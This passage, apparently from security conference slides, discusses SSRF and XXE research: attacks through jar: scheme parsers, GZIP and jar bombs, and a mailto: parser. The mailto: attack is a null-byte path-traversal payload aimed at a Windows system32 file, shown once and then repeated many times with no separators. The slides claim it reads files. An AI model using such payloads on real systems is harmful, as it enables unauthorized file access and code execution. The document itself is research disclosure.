– DoS by multiple GZIP bombs

Working on real examples

Counter-attack on JAR parser

XML engines support jar: scheme. Calling some URL using this scheme, JAR parser opens a remote archive and takes a file from it. If there is a file parsing vulnerability in JAR parser, it will be possible to attack the server.

• Directory traversal

– Tested: JDK jar parser – not vulnerable

• Jar bombs

Working on real examples

Counter-attack on mailto: parser

• mailto:%00%00..\..\..\..\..\..\..\..\\..\\..\\..\\..\\..\\..//..//..//..//..//../../../../../../windows/system32/aaaa.exe

• Successfully read the file

• There should be an RCE but….

Found yesterday :)

mailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exemailto:%00%00../../../../../../../..//..//..//..//..//..//..//..//..//..//..//../../../../../../windows/system32/aaaa.exe

Conclusion?

“Let’s put it under a firewall”is not a solution anymore

XXE ScannerTo be released at ZeroNights

Conclusion 2

• SSRF attacks are very dangerous

• They have a very wide range, which is still poorly covered

• Gopher example is not the only one, I suppose

• It is still a big research area

• A lot of technologies and applications can be used for SSRF

• I only check those places where I am working a lot

• But there are still many uncovered areas

• OWASP-EAS SSRF wiki

• Let’s make the biggest database of SSRFs

• Mail me if you have any ideas

Web: www.erpscan.come-mail: info@erpscan.com

Twitter: @erpscan@sh2kerr